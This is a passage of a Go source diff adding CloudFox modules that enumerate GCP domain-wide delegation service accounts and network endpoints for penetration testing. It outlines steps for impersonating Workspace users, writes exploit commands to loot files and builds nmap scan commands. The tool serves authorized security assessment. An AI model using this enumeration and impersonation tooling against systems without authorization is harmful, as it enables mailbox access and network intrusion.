DNSOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DNS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/domainwidedelegation.go b/gcp/commands/domainwidedelegation.go new file mode 100644 index 00000000..98dcef43 --- /dev/null +++ b/gcp/commands/domainwidedelegation.go @@ -0,0 +1,291 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + domainwidedelegationservice "github.com/BishopFox/cloudfox/gcp/services/domainWideDelegationService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPDomainWideDelegationCommand = &cobra.Command{ + Use: globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + Aliases: []string{"dwd", "delegation", "workspace-delegation"}, + Short: "Find service accounts with Domain-Wide Delegation to Google Workspace", + Long: `Find service accounts configured for Domain-Wide Delegation (DWD). + +Domain-Wide Delegation allows a service account to impersonate any user in a +Google Workspace domain. This is EXTREMELY powerful and a high-value target. + +With DWD + a service account key, an attacker can: +- Read any user's Gmail +- Access any user's Google Drive +- View any user's Calendar +- Enumerate all users and groups via Admin Directory API +- Send emails as any user +- And much more depending on authorized scopes + +Detection Method: +- Service accounts with OAuth2 Client ID set have DWD enabled +- The actual authorized scopes are configured in Google Admin Console +- We check for naming patterns that suggest DWD purpose + +To Exploit: +1. Obtain a key for the DWD service account +2. Identify a target user email in the Workspace domain +3. Generate tokens with the target user as 'subject' +4. Access Workspace APIs as that user + +Note: Scopes must be authorized in Admin Console > Security > API Controls`, + Run: runGCPDomainWideDelegationCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type DomainWideDelegationModule struct { + gcpinternal.BaseGCPModule + + DWDAccounts []domainwidedelegationservice.DWDServiceAccount + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type DomainWideDelegationOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o DomainWideDelegationOutput) TableFiles() []internal.TableFile { return o.Table } +func (o DomainWideDelegationOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPDomainWideDelegationCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + if err != nil { + return + } + + module := &DomainWideDelegationModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + DWDAccounts: []domainwidedelegationservice.DWDServiceAccount{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *DomainWideDelegationModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, m.processProject) + + if len(m.DWDAccounts) == 0 { + logger.InfoM("No Domain-Wide Delegation service accounts found", globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + return + } + + // Count confirmed DWD accounts + confirmedDWD := 0 + criticalCount := 0 + for _, account := range m.DWDAccounts { + if account.DWDEnabled { + confirmedDWD++ + } + if account.RiskLevel == "CRITICAL" { + criticalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d potential DWD service account(s) (%d confirmed)", len(m.DWDAccounts), confirmedDWD), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + + if criticalCount > 0 { + logger.InfoM(fmt.Sprintf("[CRITICAL] %d DWD accounts with keys - can impersonate Workspace users!", criticalCount), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *DomainWideDelegationModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Checking DWD service accounts in project: %s", projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } + + svc := domainwidedelegationservice.New() + accounts, err := svc.GetDWDServiceAccounts(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME, + fmt.Sprintf("Could not check DWD service accounts in project %s", projectID)) + return + } + + m.mu.Lock() + m.DWDAccounts = append(m.DWDAccounts, accounts...) + + for _, account := range accounts { + m.addAccountToLoot(account) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS && len(accounts) > 0 { + logger.InfoM(fmt.Sprintf("Found %d DWD account(s) in project %s", len(accounts), projectID), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *DomainWideDelegationModule) initializeLootFiles() { + m.LootMap["dwd-commands"] = &internal.LootFile{ + Name: "dwd-commands", + Contents: "# Domain-Wide Delegation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *DomainWideDelegationModule) addAccountToLoot(account domainwidedelegationservice.DWDServiceAccount) { + // Add exploit commands for each account + if len(account.ExploitCommands) > 0 { + m.LootMap["dwd-commands"].Contents += fmt.Sprintf( + "## Service Account: %s (Project: %s)\n"+ + "# DWD Enabled: %v\n"+ + "# OAuth2 Client ID: %s\n"+ + "# Keys: %d user-managed key(s)\n", + account.Email, account.ProjectID, + account.DWDEnabled, + account.OAuth2ClientID, + len(account.Keys), + ) + // List key details + for _, key := range account.Keys { + m.LootMap["dwd-commands"].Contents += fmt.Sprintf( + "# - Key ID: %s (Created: %s, Expires: %s, Algorithm: %s)\n", + key.KeyID, key.CreatedAt, key.ExpiresAt, key.KeyAlgorithm, + ) + } + m.LootMap["dwd-commands"].Contents += "\n" + for _, cmd := range account.ExploitCommands { + m.LootMap["dwd-commands"].Contents += cmd + "\n" + } + m.LootMap["dwd-commands"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Main table - one row per key (or one row if no keys) + header := []string{ + "Project ID", + "Project Name", + "Email", + "DWD Enabled", + "OAuth2 Client ID", + "Key ID", + "Key Created", + "Key Expires", + "Key Algorithm", + } + + var body [][]string + for _, account := range m.DWDAccounts { + dwdStatus := "No" + if account.DWDEnabled { + dwdStatus = "Yes" + } + + clientID := account.OAuth2ClientID + if clientID == "" { + clientID = "-" + } + + if len(account.Keys) > 0 { + // One row per key + for _, key := range account.Keys { + body = append(body, []string{ + account.ProjectID, + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + key.KeyID, + key.CreatedAt, + key.ExpiresAt, + key.KeyAlgorithm, + }) + } + } else { + // Account with no keys - still show it + body = append(body, []string{ + account.ProjectID, + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + "-", + "-", + "-", + "-", + }) + } + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "domain-wide-delegation", + Header: header, + Body: body, + }, + } + + output := DomainWideDelegationOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go new file mode 100644 index 00000000..1f3baa78 --- /dev/null +++ b/gcp/commands/endpoints.go @@ -0,0 +1,1036 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + compute "google.golang.org/api/compute/v1" + run "google.golang.org/api/run/v1" +) + +var GCPEndpointsCommand = &cobra.Command{ + Use: "endpoints", + Aliases: []string{"exposure", "external", "public-ips", "internet-facing"}, + Short: "Enumerate all network endpoints (external and internal) with IPs, ports, and hostnames", + Long: `Enumerate all network endpoints in GCP with comprehensive analysis. + +Features: +- Enumerates external IP addresses (static and ephemeral) +- Enumerates internal IP addresses for instances +- Lists load balancers (HTTP(S), TCP, UDP) - both external and internal +- Shows instances with external and internal IPs +- Lists Cloud Run and Cloud Functions URLs +- Analyzes firewall rules to determine open ports +- Generates nmap commands for penetration testing + +Output includes separate tables and loot files for external and internal endpoints.`, + Run: runGCPEndpointsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type Endpoint struct { + ProjectID string + Name string + Type string // Static IP, Instance IP, LoadBalancer, Cloud Run, etc. + Address string + FQDN string + Protocol string + Port string + Resource string + ResourceType string + Region string + Status string + ServiceAccount string + TLSEnabled bool + RiskLevel string + RiskReasons []string + IsExternal bool // true for external IPs, false for internal + NetworkTags []string // Tags for firewall rule matching + Network string // VPC network name +} + +type FirewallRule struct { + ProjectID string + RuleName string + Network string + Direction string + SourceRanges []string + Ports []string + Protocol string + TargetTags []string + RiskLevel string + RiskReasons []string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type EndpointsModule struct { + gcpinternal.BaseGCPModule + + ExternalEndpoints []Endpoint + InternalEndpoints []Endpoint + FirewallRules []FirewallRule + LootMap map[string]*internal.LootFile + mu sync.Mutex + + // Firewall rule mapping: "network:tag1,tag2" -> allowed ports + // Key format: "network-name" for rules with no target tags, or "network-name:tag1,tag2" for tagged rules + firewallPortMap map[string][]string +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type EndpointsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o EndpointsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o EndpointsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "endpoints") + if err != nil { + return + } + + module := &EndpointsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ExternalEndpoints: []Endpoint{}, + InternalEndpoints: []Endpoint{}, + FirewallRules: []FirewallRule{}, + LootMap: make(map[string]*internal.LootFile), + firewallPortMap: make(map[string][]string), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "endpoints", m.processProject) + + totalEndpoints := len(m.ExternalEndpoints) + len(m.InternalEndpoints) + if totalEndpoints == 0 && len(m.FirewallRules) == 0 { + logger.InfoM("No endpoints found", "endpoints") + return + } + + logger.SuccessM(fmt.Sprintf("Found %d external endpoint(s), %d internal endpoint(s), %d firewall rule(s)", + len(m.ExternalEndpoints), len(m.InternalEndpoints), len(m.FirewallRules)), "endpoints") + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *EndpointsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing endpoints in project: %s", projectID), "endpoints") + } + + computeService, err := compute.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not create Compute service in project %s", projectID)) + return + } + + // 1. Analyze firewall rules FIRST to build port mapping for instances + m.analyzeFirewallRules(ctx, computeService, projectID, logger) + + // 2. Get static external IPs + m.getStaticExternalIPs(ctx, computeService, projectID, logger) + + // 3. Get instances (both external and internal IPs) + m.getInstanceIPs(ctx, computeService, projectID, logger) + + // 4. Get load balancers (both external and internal) + m.getLoadBalancers(ctx, computeService, projectID, logger) + + // 5. Get Cloud Run services (always external) + m.getCloudRunServices(ctx, projectID, logger) +} + +// getStaticExternalIPs retrieves static external IP addresses +func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Global addresses + req := svc.GlobalAddresses.List(projectID) + err := req.Pages(ctx, func(page *compute.AddressList) error { + for _, addr := range page.Items { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + Address: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: user, + ResourceType: "Address", + Region: "global", + Status: addr.Status, + RiskLevel: "Medium", + RiskReasons: []string{"Static external IP"}, + IsExternal: true, + } + if user == "" { + ep.RiskReasons = append(ep.RiskReasons, "Unused static IP") + } + m.addEndpoint(ep) + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global addresses in project %s", projectID)) + } + + // Regional addresses + regionsReq := svc.Regions.List(projectID) + err = regionsReq.Pages(ctx, func(page *compute.RegionList) error { + for _, region := range page.Items { + addrReq := svc.Addresses.List(projectID, region.Name) + err := addrReq.Pages(ctx, func(addrPage *compute.AddressList) error { + for _, addr := range addrPage.Items { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + Address: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: user, + ResourceType: "Address", + Region: region.Name, + Status: addr.Status, + RiskLevel: "Medium", + RiskReasons: []string{"Static external IP"}, + IsExternal: true, + } + if user == "" { + ep.RiskReasons = append(ep.RiskReasons, "Unused static IP") + } + m.addEndpoint(ep) + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list addresses in region %s", region.Name)) + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regions in project %s", projectID)) + } +} + +// getInstanceIPs retrieves instances with both external and internal IPs +func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Instances.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + for _, instance := range scopedList.Instances { + zoneName := extractZoneFromScope(zone) + + // Get service account + var serviceAccount string + if len(instance.ServiceAccounts) > 0 { + serviceAccount = instance.ServiceAccounts[0].Email + } + + for _, iface := range instance.NetworkInterfaces { + networkName := extractResourceName(iface.Network) + + // Collect external IPs + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Instance IP", + Address: accessConfig.NatIP, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: instance.Name, + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: true, + NetworkTags: instance.Tags.Items, + Network: networkName, + } + + // Classify risk + ep.RiskLevel, ep.RiskReasons = m.classifyInstanceRisk(instance) + + m.addEndpoint(ep) + } + } + + // Collect internal IPs + if iface.NetworkIP != "" { + // Determine ports from firewall rules + ports := m.getPortsForInstance(networkName, instance.Tags) + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Internal IP", + Address: iface.NetworkIP, + Protocol: "TCP/UDP", + Port: ports, + Resource: instance.Name, + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: false, + NetworkTags: instance.Tags.Items, + Network: networkName, + } + + ep.RiskLevel, ep.RiskReasons = m.classifyInternalInstanceRisk(instance, ports) + m.addEndpoint(ep) + } + } + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list instances in project %s", projectID)) + } +} + +// getPortsForInstance determines open ports for an instance based on firewall rules +func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags) string { + var allPorts []string + + // Check for rules with no target tags (apply to all instances in network) + if ports, ok := m.firewallPortMap[network]; ok { + allPorts = append(allPorts, ports...) + } + + // Check for rules matching instance tags + if tags != nil { + for _, tag := range tags.Items { + key := fmt.Sprintf("%s:%s", network, tag) + if ports, ok := m.firewallPortMap[key]; ok { + allPorts = append(allPorts, ports...) + } + } + } + + if len(allPorts) == 0 { + return "ALL" // Unknown, scan all ports + } + + // Deduplicate ports + portSet := make(map[string]bool) + for _, p := range allPorts { + portSet[p] = true + } + var uniquePorts []string + for p := range portSet { + uniquePorts = append(uniquePorts, p) + } + + return strings.Join(uniquePorts, ",") +} + +// classifyInternalInstanceRisk determines risk for internal endpoints +func (m *EndpointsModule) classifyInternalInstanceRisk(instance *compute.Instance, ports string) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Internal network access") + + for _, sa := range instance.ServiceAccounts { + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine SA") + score += 1 + } + + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + reasons = append(reasons, "Has cloud-platform scope") + score += 2 + } + } + } + + // Check for dangerous ports + dangerousPorts := []string{"22", "3389", "3306", "5432", "27017", "6379"} + for _, dp := range dangerousPorts { + if strings.Contains(ports, dp) { + score += 1 + break + } + } + + if score >= 3 { + return "High", reasons + } else if score >= 1 { + return "Medium", reasons + } + return "Low", reasons +} + +// getLoadBalancers retrieves both external and internal load balancers +func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Regional forwarding rules + req := svc.ForwardingRules.AggregatedList(projectID) + err := req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.ForwardingRules == nil { + continue + } + for _, rule := range scopedList.ForwardingRules { + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } else if len(rule.Ports) > 0 { + ports = strings.Join(rule.Ports, ",") + } + + target := extractResourceName(rule.Target) + if target == "" && rule.BackendService != "" { + target = extractResourceName(rule.BackendService) + } + + isExternal := rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" + isInternal := rule.LoadBalancingScheme == "INTERNAL" || rule.LoadBalancingScheme == "INTERNAL_MANAGED" || rule.LoadBalancingScheme == "INTERNAL_SELF_MANAGED" + + if isExternal { + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: "LoadBalancer", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: target, + ResourceType: "ForwardingRule", + Region: extractRegionFromScope(region), + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Medium", + RiskReasons: []string{"External load balancer"}, + IsExternal: true, + Network: extractResourceName(rule.Network), + } + + if !ep.TLSEnabled && ports != "443" { + ep.RiskLevel = "High" + ep.RiskReasons = append(ep.RiskReasons, "No TLS/HTTPS") + } + + m.addEndpoint(ep) + } else if isInternal { + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: "Internal LB", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: target, + ResourceType: "ForwardingRule", + Region: extractRegionFromScope(region), + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Low", + RiskReasons: []string{"Internal load balancer"}, + IsExternal: false, + Network: extractResourceName(rule.Network), + } + + m.addEndpoint(ep) + } + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list forwarding rules in project %s", projectID)) + } + + // Global forwarding rules (external only - no internal global LBs) + globalReq := svc.GlobalForwardingRules.List(projectID) + err = globalReq.Pages(ctx, func(page *compute.ForwardingRuleList) error { + for _, rule := range page.Items { + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } + + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: "Global LoadBalancer", + Address: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: extractResourceName(rule.Target), + ResourceType: "GlobalForwardingRule", + Region: "global", + TLSEnabled: rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https"), + RiskLevel: "Medium", + RiskReasons: []string{"External global load balancer"}, + IsExternal: true, + } + + if !ep.TLSEnabled && ports != "443" { + ep.RiskLevel = "High" + ep.RiskReasons = append(ep.RiskReasons, "No TLS/HTTPS") + } + + m.addEndpoint(ep) + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global forwarding rules in project %s", projectID)) + } +} + +// getCloudRunServices retrieves Cloud Run services with public URLs +func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not create Cloud Run service in project %s", projectID)) + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) + return + } + + for _, service := range resp.Items { + if service.Status != nil && service.Status.Url != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: service.Metadata.Name, + Type: "Cloud Run", + FQDN: service.Status.Url, + Protocol: "HTTPS", + Port: "443", + ResourceType: "CloudRun", + TLSEnabled: true, + RiskLevel: "Medium", + RiskReasons: []string{"Public Cloud Run service"}, + IsExternal: true, // Cloud Run services are always external + } + + // Extract region from metadata + if service.Metadata != nil && service.Metadata.Labels != nil { + if region, ok := service.Metadata.Labels["cloud.googleapis.com/location"]; ok { + ep.Region = region + } + } + + // Get service account + if service.Spec != nil && service.Spec.Template != nil && service.Spec.Template.Spec != nil { + ep.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName + } + + m.addEndpoint(ep) + } + } +} + +// analyzeFirewallRules analyzes firewall rules and builds port mapping for instances +func (m *EndpointsModule) analyzeFirewallRules(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Firewalls.List(projectID) + err := req.Pages(ctx, func(page *compute.FirewallList) error { + for _, fw := range page.Items { + if fw.Direction != "INGRESS" { + continue + } + + networkName := extractResourceName(fw.Network) + + // Collect all allowed ports for this rule + var rulePorts []string + for _, allowed := range fw.Allowed { + if len(allowed.Ports) == 0 { + // No specific ports means all ports for this protocol + rulePorts = append(rulePorts, "ALL") + } else { + rulePorts = append(rulePorts, allowed.Ports...) + } + } + + // Build firewall port map for internal IP port determination + m.mu.Lock() + if len(fw.TargetTags) == 0 { + // Rule applies to all instances in network + m.firewallPortMap[networkName] = append(m.firewallPortMap[networkName], rulePorts...) + } else { + // Rule applies to instances with specific tags + for _, tag := range fw.TargetTags { + key := fmt.Sprintf("%s:%s", networkName, tag) + m.firewallPortMap[key] = append(m.firewallPortMap[key], rulePorts...) + } + } + m.mu.Unlock() + + // Check if rule allows ingress from 0.0.0.0/0 (public access) + isPublic := false + for _, sr := range fw.SourceRanges { + if sr == "0.0.0.0/0" { + isPublic = true + break + } + } + + if isPublic { + fwRule := FirewallRule{ + ProjectID: projectID, + RuleName: fw.Name, + Network: networkName, + Direction: fw.Direction, + SourceRanges: fw.SourceRanges, + TargetTags: fw.TargetTags, + Ports: rulePorts, + } + + // Get protocol + if len(fw.Allowed) > 0 { + fwRule.Protocol = fw.Allowed[0].IPProtocol + } + + // Classify risk + fwRule.RiskLevel, fwRule.RiskReasons = m.classifyFirewallRisk(fwRule) + + m.mu.Lock() + m.FirewallRules = append(m.FirewallRules, fwRule) + m.mu.Unlock() + } + } + return nil + }) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list firewall rules in project %s", projectID)) + } +} + +// addEndpoint adds an endpoint thread-safely to appropriate list and to loot +func (m *EndpointsModule) addEndpoint(ep Endpoint) { + m.mu.Lock() + if ep.IsExternal { + m.ExternalEndpoints = append(m.ExternalEndpoints, ep) + } else { + m.InternalEndpoints = append(m.InternalEndpoints, ep) + } + m.addEndpointToLoot(ep) + m.mu.Unlock() +} + +// classifyInstanceRisk determines the risk level of an exposed instance +func (m *EndpointsModule) classifyInstanceRisk(instance *compute.Instance) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Has external IP") + score += 1 + + for _, sa := range instance.ServiceAccounts { + if strings.Contains(sa.Email, "-compute@developer.gserviceaccount.com") { + reasons = append(reasons, "Uses default Compute Engine SA") + score += 2 + } + + for _, scope := range sa.Scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + reasons = append(reasons, "Has cloud-platform scope (full access)") + score += 3 + } + } + } + + if score >= 4 { + return "Critical", reasons + } else if score >= 2 { + return "High", reasons + } + return "Medium", reasons +} + +// classifyFirewallRisk determines the risk level of a public firewall rule +func (m *EndpointsModule) classifyFirewallRisk(rule FirewallRule) (string, []string) { + var reasons []string + score := 0 + + reasons = append(reasons, "Allows traffic from 0.0.0.0/0") + score += 1 + + dangerousPorts := map[string]string{ + "22": "SSH", + "3389": "RDP", + "3306": "MySQL", + "5432": "PostgreSQL", + "27017": "MongoDB", + "6379": "Redis", + "9200": "Elasticsearch", + } + + for _, port := range rule.Ports { + if name, ok := dangerousPorts[port]; ok { + reasons = append(reasons, fmt.Sprintf("Exposes %s (port %s)", name, port)) + score += 3 + } + if strings.Contains(port, "-") { + reasons = append(reasons, fmt.Sprintf("Wide port range: %s", port)) + score += 2 + } + } + + if len(rule.TargetTags) == 0 { + reasons = append(reasons, "No target tags (applies to all instances)") + score += 2 + } + + if score >= 5 { + return "Critical", reasons + } else if score >= 3 { + return "High", reasons + } + return "Medium", reasons +} + +// ------------------------------ +// Helper Functions +// ------------------------------ +func extractResourceName(url string) string { + if url == "" { + return "" + } + parts := strings.Split(url, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return url +} + +func extractRegionFromScope(scope string) string { + // Format: regions/us-central1 + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +func extractZoneFromScope(scope string) string { + // Format: zones/us-central1-a + parts := strings.Split(scope, "/") + if len(parts) >= 2 { + return parts[len(parts)-1] + } + return scope +} + +// getIPAndHostname extracts IP address and hostname from an endpoint +// Returns "-" for fields that are not applicable +func getIPAndHostname(ep Endpoint) (ipAddr string, hostname string) { + ipAddr = "-" + hostname = "-" + + // If we have an IP address (Address field) + if ep.Address != "" { + ipAddr = ep.Address + } + + // If we have a FQDN/hostname + if ep.FQDN != "" { + // Strip protocol prefix + host := ep.FQDN + host = strings.TrimPrefix(host, "https://") + host = strings.TrimPrefix(host, "http://") + // Remove any trailing path + if idx := strings.Index(host, "/"); idx != -1 { + host = host[:idx] + } + hostname = host + } + + return ipAddr, hostname +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *EndpointsModule) initializeLootFiles() { + m.LootMap["endpoints-external-commands"] = &internal.LootFile{ + Name: "endpoints-external-commands", + Contents: "# External Endpoints Scan Commands\n" + + "# Generated by CloudFox\n" + + "# Use these commands for authorized penetration testing of internet-facing resources\n\n", + } + m.LootMap["endpoints-internal-commands"] = &internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: "# Internal Endpoints Scan Commands\n" + + "# Generated by CloudFox\n" + + "# Use these commands for authorized internal network penetration testing\n" + + "# Note: These targets require internal network access or VPN connection\n\n", + } +} + +func (m *EndpointsModule) addEndpointToLoot(ep Endpoint) { + target := ep.Address + if target == "" { + target = ep.FQDN + } + if target == "" { + return + } + + // Strip protocol prefix for nmap (needs just hostname/IP) + hostname := target + hostname = strings.TrimPrefix(hostname, "https://") + hostname = strings.TrimPrefix(hostname, "http://") + // Remove any trailing path + if idx := strings.Index(hostname, "/"); idx != -1 { + hostname = hostname[:idx] + } + + // Build nmap command based on endpoint type and port info + var nmapCmd string + switch { + case ep.Port == "ALL" || ep.Port == "": + // Unknown ports - scan all common ports (or full range for internal) + if ep.IsExternal { + nmapCmd = fmt.Sprintf("nmap -sV -Pn %s", hostname) + } else { + // For internal, scan all ports since we don't know what's open + nmapCmd = fmt.Sprintf("nmap -sV -Pn -p- %s", hostname) + } 